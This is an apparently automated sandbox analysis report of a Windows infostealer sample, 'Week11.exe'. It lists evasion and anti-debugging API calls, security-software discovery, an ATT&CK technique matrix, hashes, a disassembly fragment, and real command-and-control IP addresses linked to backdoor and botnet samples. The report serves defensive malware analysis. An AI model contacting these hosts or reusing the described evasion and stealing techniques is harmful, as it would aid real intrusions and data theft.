    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031CF280 GetProcessAffinityMask,GetSystemInfo
    Source: Week11.exe.bin.exe | Binary or memory string: aQeMu
    Source: Week11.exe.bin.exe | Binary or memory string: `C}P~Up@c^ueq|ycbqemu
    Source: Week11.exe.bin.exe | Binary or memory string: [TOOUGPQFNQM@CQSEDBGIOOTDQVGOPLABPQGF@BQROTESTBIVJGEWVA@FCPFRTESUCKTHEGUT@AGEVMCIESUCKTHEGUTCAGEVMMZXSUCJVJGDVW@AFDPKJRQNUCKTHEFTUBCEGTOOTDFHCKTJGDVVFF@ARHG]LYJ^KTHEFTUCBDFVLLWAVSfVTHEFVVA@FCPKJRB[]JdIHEFTT@@FDWKJQ@USDCcUEFTW@AGEWLLPAWQFMSwXFTUBCEGTMMVGQQGOPM
    Source: Week11.exe.bin.exe | Binary or memory string: [TOOUGPQFNQM@CQSEDBGIOOTDQVGOPLABPQGF@BQROTESTBIVJGEWVA@FCPFRTESUCKTHEGUT@AGEVMCIESUCKTHEGUTCAGEVMMZXSUCJVJGDVW@AFDPKJRQNUCKTHEFTUBCEGTOOTDFHCKTJGDVVFF@ARHG]LYJ^KTHEFTUCBDFVLLWAVSfVTHEFVVA@FCPKJRB[]JdIHEFTT@@FDWKJQ@USDCcUEFTW@AGEWLLPAWQFMSwXFTUBCEGTMMVGQQGOPM[TUBBDEVMMWFPVGOQNC
    Source: Week11.exe.bin.exe, 00000001.00000002.2482160127.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031FB880 rdtscp
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0048AC3C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0047A660 GetCurrentThreadId,GetProcessHeap,OpenThread,OpenThread,GetLastError,GetProcessHeap,HeapFree,OutputDebugStringW,CloseHandle
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0043E2B0 SetErrorMode,ImmDisableIME,GetCommandLineW,CreateMutexW,GetLastError,CloseHandle,StrStrIW,StrStrIW,StrStrIW,FindWindowW,PostMessageW,FindWindowW,PostMessageW,CoInitialize,OleInitialize,LoadLibraryW,GetProcAddress,IsUserAnAdmin,StrStrIW,CloseHandle,DefWindowProcW,InitCommonControlsEx,OleUninitialize,CoUninitialize,CloseHandle,GetModuleHandleW,GetProcAddress
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0047A0E0 GetProcessHeap,HeapLock,HeapWalk,HeapWalk,HeapWalk,HeapUnlock
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0048AC3C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0048B2A4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0048B9CE __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_031E51F0 RtlAddVectoredExceptionHandler,SetUnhandledExceptionFilter
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_004AA320 cpuid
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo | 1_2_004A0059
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW | 1_2_004945BC
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement | 1_2_004A06C7
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement | 1_2_004A091F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: GetLocaleInfoA | 1_2_004A49B4
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement | 1_2_004A0BE5
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP | 1_2_004A10F0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA | 1_2_004A1207
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen | 1_2_004A129F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage | 1_2_004A1313
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage | 1_2_004A14E5
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA | 1_2_004A15A6
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s | 1_2_004A1649
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA | 1_2_004A160D
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: GetLocaleInfoA | 1_2_004A39CC
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA | 1_2_004A1AE2
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW | 1_2_004A1AAE
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat | 1_2_004A1C21
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation
    Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0049CB77 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00496B9D __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,1_2_00496B9D
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0047E640 _memset,GetVersionExW,GetVersionExW,GetVersionExW,GetModuleHandleW,GetProcAddress,1_2_0047E640
    Source: Week11.exe.bin.exeBinary or memory string: \safemon\360tray.exe
    Source: Week11.exe.bin.exeBinary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe

    Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: Week11.exe.bin.exe PID: 7116, type: MEMORYSTR

    Remote Access Functionality

Source: Yara match | File source: Process Memory Space: Week11.exe.bin.exe PID: 7116, type: MEMORYSTR
Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0043DD80 RpcAsyncInitializeHandle,CreateEventW,RpcStringBindingComposeW,RpcBindingFromStringBindingW,WaitForSingleObject,RpcAsyncCompleteCall,CloseHandle,RpcStringFreeW,RpcBindingFree | 1_2_0043DD80
Source: C:\Users\user\Desktop\Week11.exe.bin.exe | Code function: 1_2_0043DECD CloseHandle,RpcStringFreeW,RpcBindingFree | 1_2_0043DECD
MITRE ATT&CK matrix (the number before a technique is the count of matching signatures in this report):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 Bootkit | 1 DLL Side-Loading | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | Boot or Logon Initialization Scripts | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 151 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 3 Obfuscated Files or Information | Security Account Manager | 1 Application Window Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Bootkit | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | 1 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 34 System Information Discovery | SSH | Keylogging | 1 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | 1 Proxy | Data Transfer Size Limits | Service Stop
Source | Detection | Scanner | Label | Link
Week11.exe.bin.exe | 37% | ReversingLabs | Win32.Infostealer.Tinba |
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
Source | Detection | Scanner | Label | Link
http://188.130.206.243heaXtT44tdKipmZh:U1K/ZFS/B554WCj6H79.pow8BpV.hQr2pbE3AbJ2hKD.cW01SSc0hAZ6j7b | 0% | Avira URL Cloud | safe |
http://188.130.206.243/ | 0% | Avira URL Cloud | safe |
http://188.130.206.243 | 0% | Avira URL Cloud | safe |
http://188.130.206.243http://46.8.232.106 | 0% | Avira URL Cloud | safe |
    No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://46.8.232.106/ | false | | high
http://46.8.236.61/ | false | | high
http://93.185.159.253/ | false | | high
http://188.130.206.243/ | false | Avira URL Cloud: safe | unknown
http://91.212.166.91/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://46.8.232.106 | Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://188.130.206.243heaXtT44tdKipmZh:U1K/ZFS/B554WCj6H79.pow8BpV.hQr2pbE3AbJ2hKD.cW01SSc0hAZ6j7b | Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F2000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://188.130.206.243http://46.8.232.106 | Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F2000.00000004.00001000.00020000.00000000.sdmp, Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://188.130.206.243 | Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://93.185.159.253 | Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://46.8.236.61 | Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://www.360totalsecurity.com/d/ts/%s/%s/channelOpen | Week11.exe.bin.exe | false | | high
http://s.360safe.com/safei18n/ | Week11.exe.bin.exe | false | | high
http://91.212.166.91 | Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://store.360totalsecurity.com/shared.xml | | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
46.8.232.106 | unknown | Russian Federation | 28917 | FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | false
188.130.206.243 | unknown | Russian Federation | 200509 | SVINT-ASNES | false
185.157.213.253 | unknown | Spain | 50129 | TVHORADADAES | true
93.185.159.253 | unknown | Russian Federation | 39912 | I3B-ASAT | false
91.212.166.91 | unknown | United Kingdom | 35819 | MOBILY-ASEtihadEtisalatCompanyMobilySA | false
46.8.236.61 | unknown | Russian Federation | 28917 | FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | false
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1553244
                          Start date and time:2024-11-10 16:47:13 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 5m 56s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:12
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Week11.exe.bin.exe
                          Detection:MAL
                          Classification:mal80.troj.evad.winEXE@1/1@0/6
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 118
                          • Number of non-executed functions: 162
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • VT rate limit hit for: Week11.exe.bin.exe
                          No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
46.8.232.106 | m0Yc9KltGw.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | SecuriteInfo.com.FileRepMalware.7838.24766.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | BwqqVoHR71.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | BwqqVoHR71.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | sV9ElC4fU4.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | antispam_connect1.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | antispam_connect1.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | 5ndBtx7pRX.exe | malicious | GO Backdoor | 46.8.232.106/
188.130.206.243 | m0Yc9KltGw.exe | malicious | GO Backdoor | 188.130.206.243/
188.130.206.243 | SecuriteInfo.com.FileRepMalware.7838.24766.exe | malicious | GO Backdoor | 188.130.206.243/
188.130.206.243 | BwqqVoHR71.exe | malicious | GO Backdoor | 188.130.206.243/
188.130.206.243 | BwqqVoHR71.exe | malicious | GO Backdoor | 188.130.206.243/
188.130.206.243 | antispam_connect1.exe | malicious | GO Backdoor | 188.130.206.243/
93.185.159.253 | m0Yc9KltGw.exe | malicious | GO Backdoor | 93.185.159.253/
93.185.159.253 | SecuriteInfo.com.FileRepMalware.7838.24766.exe | malicious | GO Backdoor | 93.185.159.253/
93.185.159.253 | BwqqVoHR71.exe | malicious | GO Backdoor | 93.185.159.253/
93.185.159.253 | BwqqVoHR71.exe | malicious | GO Backdoor | 93.185.159.253/
93.185.159.253 | sV9ElC4fU4.exe | malicious | GO Backdoor | 93.185.159.253/
93.185.159.253 | antispam_connect1.exe | malicious | GO Backdoor | 93.185.159.253/
93.185.159.253 | antispam_connect1.exe | malicious | GO Backdoor | 93.185.159.253/
93.185.159.253 | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 93.185.159.253/
93.185.159.253 | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 93.185.159.253/
93.185.159.253 | 5ndBtx7pRX.exe | malicious | GO Backdoor | 93.185.159.253/
                          No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SVINT-ASNES | m0Yc9KltGw.exe | malicious | GO Backdoor | 188.130.206.243
SVINT-ASNES | https://t.ly/Oppenheim0511 | malicious | GO Backdoor | 188.130.206.243
SVINT-ASNES | SecuriteInfo.com.FileRepMalware.7838.24766.exe | malicious | GO Backdoor | 188.130.206.243
SVINT-ASNES | https://t.ly/BavariaFilmGmbH2410 | malicious | Unknown | 188.130.206.243
SVINT-ASNES | BwqqVoHR71.exe | malicious | GO Backdoor | 188.130.206.243
SVINT-ASNES | BwqqVoHR71.exe | malicious | GO Backdoor | 188.130.206.243
SVINT-ASNES | antispam_connect1.exe | malicious | GO Backdoor | 188.130.206.243
SVINT-ASNES | na.elf | malicious | Mirai, Moobot | 188.130.200.140
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | m0Yc9KltGw.exe | malicious | GO Backdoor | 46.8.236.61
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | https://t.ly/Oppenheim0511 | malicious | GO Backdoor | 46.8.232.106
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | SecuriteInfo.com.FileRepMalware.3248.17662.exe | malicious | Unknown | 46.8.237.66
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | fCr6yd61xw.exe | malicious | PureLog Stealer, zgRAT | 46.8.237.66
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | fCr6yd61xw.exe | malicious | PureLog Stealer, zgRAT | 46.8.237.66
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | Zo1o3PhmtM.exe | malicious | Unknown | 46.8.237.66
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | 67JPbskewt.exe | malicious | Unknown | 46.8.237.66
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | SecuriteInfo.com.FileRepMalware.7838.24766.exe | malicious | GO Backdoor | 46.8.236.61
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | nabspc.elf | malicious | Unknown | 109.248.104.45
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | https://t.ly/BavariaFilmGmbH2410 | malicious | Unknown | 46.8.232.106
MOBILY-ASEtihadEtisalatCompanyMobilySA | yakuza.m68k.elf | malicious | Unknown | 86.51.171.28
MOBILY-ASEtihadEtisalatCompanyMobilySA | shindemips.elf | malicious | Unknown | 86.51.211.142
MOBILY-ASEtihadEtisalatCompanyMobilySA | 5r3fqt67ew531has4231.x86.elf | malicious | Mirai, Okiru | 176.224.147.28
MOBILY-ASEtihadEtisalatCompanyMobilySA | xX1k6Ghe8s.elf | malicious | Mirai | 31.167.93.149
MOBILY-ASEtihadEtisalatCompanyMobilySA | hiss.arm7.elf | malicious | Unknown | 176.17.147.223
MOBILY-ASEtihadEtisalatCompanyMobilySA | sora.ppc.elf | malicious | Unknown | 46.44.86.64
MOBILY-ASEtihadEtisalatCompanyMobilySA | bin.m68k.elf | malicious | Mirai | 37.127.89.210
MOBILY-ASEtihadEtisalatCompanyMobilySA | sDX1AXN1Zp.elf | malicious | Mirai, Moobot | 178.81.153.33
MOBILY-ASEtihadEtisalatCompanyMobilySA | pSU7fuySjo.elf | malicious | Mirai, Moobot | 62.120.247.164
MOBILY-ASEtihadEtisalatCompanyMobilySA | e5AiOG6uDI.elf | malicious | Mirai, Moobot | 37.217.63.91
I3B-ASAT | XWHcHAzqPR.exe | malicious | Unknown | 195.16.240.249
I3B-ASAT | byte.sh4.elf | malicious | Mirai, Okiru | 195.16.237.179
I3B-ASAT | m0Yc9KltGw.exe | malicious | GO Backdoor | 93.185.159.253
I3B-ASAT | https://t.ly/Oppenheim0511 | malicious | GO Backdoor | 93.185.159.253
I3B-ASAT | la.bot.sh4.elf | malicious | Unknown | 195.16.243.93
I3B-ASAT | SecuriteInfo.com.FileRepMalware.7838.24766.exe | malicious | GO Backdoor | 93.185.159.253
I3B-ASAT | https://t.ly/BavariaFilmGmbH2410 | malicious | Unknown | 93.185.159.253
I3B-ASAT | BwqqVoHR71.exe | malicious | GO Backdoor | 93.185.159.253
I3B-ASAT | BwqqVoHR71.exe | malicious | GO Backdoor | 93.185.159.253
I3B-ASAT | botnet.x86.elf | malicious | Mirai, Moobot | 78.142.85.12
TVHORADADAES | http://virtual.urban-orthodontics.com | malicious | Unknown | 185.76.79.50
TVHORADADAES | https://virtual.urban-orthodontics.com | malicious | Unknown | 185.76.79.50
TVHORADADAES | https://virtual.urban-orthodontics.com | malicious | Unknown | 185.76.79.50
TVHORADADAES | https://virtual.urban-orthodontics.com | malicious | Unknown | 185.76.79.50
TVHORADADAES | nullnet_load.arm.elf | malicious | Mirai | 156.67.60.56
TVHORADADAES | nullnet_load.x86.elf | malicious | Mirai | 156.67.60.68
TVHORADADAES | GkyZlYczv9.dll | malicious | BumbleBee | 95.156.207.204
TVHORADADAES | garm.elf | malicious | Mirai | 156.67.60.61
TVHORADADAES | tel.arm.elf | malicious | Mirai | 156.67.60.38
TVHORADADAES | tmips.elf | malicious | Mirai | 156.67.60.33
                          No context
                          No context
                          Process:C:\Users\user\Desktop\Week11.exe.bin.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):416
                          Entropy (8bit):6.2489104762331475
                          Encrypted:false
                          SSDEEP:12:vaXqyZ0FasUGy6LqjceprRqLjS/YAUzv17X94C:vaayZ0ssUt6L3eprIK0X94C
                          MD5:FF0C9980550DB88C572D6ED72876FD60
                          SHA1:5041D85958F291D8EF77FD99AD33EA7D6FA3B2AD
                          SHA-256:2A76C349185C1F14EED769B13ED4D7F93E98DD432CCC9C78B1A8111E4BC4AE19
                          SHA-512:F7A09D09D91301E0931CA79C06B877249B40368D4DA710B73701D97222DAC9E4C0013BA5060D112D2094952CDE373C147F7AA1E1FBE4358FF36E3F1B4CF37E4B
                          Malicious:false
                          Reputation:low
                          Preview:...>.3W[.."...4.S2R$A</4L-[S]0 .X.^^M...Q%.9@.8.Q..#Z&.%\."#M.9VX40.^.(=U.Y.E)5...<...<_.R5..$^2Y>!.F.3_A...W_.._R..@<.%[%]1G..\\4.QP,.._..*@7._UWY%X%) B>"..&V<."..../0...6SU.8A...L594P*%.].%)M6%.X1-$V2'.V...G4.6_.*.V;-.P)9<@^-TQ...\$%<]0..O#61."2..P.-...0.5%$T.'7LZ.4FPW.W.&.R..-G. <\.+.RY6.[^..@.+.R^.._52(X.<4M-W.P3(._.>.O.90.R....9..W!...[,T%8.L(-.F..8_R..[%4.Q...@.%"R\><ZW. ^2.5M+.Q[.-.^6.RU8>.G...\3..W,.QZ.(.
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.35629862468688
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:Week11.exe.bin.exe
                          File size:8'848'896 bytes
                          MD5:4fbc4f26e90324c3b535943452460761
                          SHA1:032f96166bb573c9029f65aefb91d22b8a4940ed
                          SHA256:82e9465d41073e2678135009e179de5a0d0973bf439f6cac53db9b9f45130148
                          SHA512:a6e2bf5a0f5268aaae2dd21f1fede5be9a6afc9bf967438578fd4809a58859ce873c6aa3fc95ec65e2a29470577c4ffa8f0ad186f410f76533d5b2e5d7094c09
                          SSDEEP:98304:O3joQ1BjUhH1aOFHyq0KqSYLsDu0eK0DuCglDboo:ijUhVa2HyqgLIuXKyu1R0o
                          TLSH:EF96AEAB09176DD5EEF84F719728E99A4396C463B93CC1BEBB4764A8C211BC344E03D4
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B...,...,...,.......,.......,...B...,...A...,...W...,...-...,.......,.....i.,.......,.......,.......,.......,.Rich..,........
                          Icon Hash:615545d4aaa2d423
                          Entrypoint:0x48eb4e
                          Entrypoint Section:.text
                          Digitally signed:true
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x5F92B0F1 [Fri Oct 23 10:31:13 2020 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:0
                          File Version Major:5
                          File Version Minor:0
                          Subsystem Version Major:5
                          Subsystem Version Minor:0
                          Import Hash:44c9a0d6caae769769c87976fb6f71d4
                          Signature Valid:
                          Signature Issuer:
                          Signature Validation Error:
                          Error Number:
                          Not Before, Not After
                            Subject Chain
                              Version:
                              Thumbprint MD5:
                              Thumbprint SHA-1:
                              Thumbprint SHA-256:
                              Serial:
                              Instruction
                              call 00007F3D448D4EB9h
                              jmp 00007F3D448C6D0Eh
                              mov edi, edi
                              push ebp
                              mov ebp, esp
                              push ecx
                              push ebx
                              mov eax, dword ptr [ebp+0Ch]
                              add eax, 0Ch
                              mov dword ptr [ebp-04h], eax
                              mov ebx, dword ptr fs:[00000000h]
                              mov eax, dword ptr [ebx]
                              mov dword ptr fs:[00000000h], eax
                              mov eax, dword ptr [ebp+08h]
                              mov ebx, dword ptr [ebp+0Ch]
                              mov ebp, dword ptr [ebp-04h]
                              mov esp, dword ptr [ebx-04h]
                              jmp eax
                              pop ebx
                              leave
                              retn 0008h
                              pop eax
                              pop ecx
                              xchg dword ptr [esp], eax
                              jmp eax
                              mov edi, edi
                              push ebp
                              mov ebp, esp
                              push ecx
                              push ecx
                              push ebx
                              push esi
                              push edi
                              mov esi, dword ptr fs:[00000000h]
                              mov dword ptr [ebp-04h], esi
                              mov dword ptr [ebp-08h], 0048EBBCh
                              push 00000000h
                              push dword ptr [ebp+0Ch]
                              push dword ptr [ebp-08h]
                              push dword ptr [ebp+08h]
                              call 00007F3D448DF963h
                              mov eax, dword ptr [ebp+0Ch]
                              mov eax, dword ptr [eax+04h]
                              and eax, FFFFFFFDh
                              mov ecx, dword ptr [ebp+0Ch]
                              mov dword ptr [ecx+04h], eax
                              mov edi, dword ptr fs:[00000000h]
                              mov ebx, dword ptr [ebp-04h]
                              mov dword ptr [ebx], edi
                              mov dword ptr fs:[00000000h], ebx
                              pop edi
                              pop esi
                              pop ebx
                              leave
                              retn 0008h
                              push ebp
                              mov ebp, esp
                              sub esp, 08h
                              push ebx
                              push esi
                              push edi
                              cld
                              mov dword ptr [ebp-04h], eax
                              xor eax, eax
                              push eax
                              push eax
                              push eax
                              push dword ptr [ebp-04h]
                              push dword ptr [ebp+14h]
                              push dword ptr [ebp+10h]
                              push dword ptr [ebp+0Ch]
                              push dword ptr [ebp+08h]
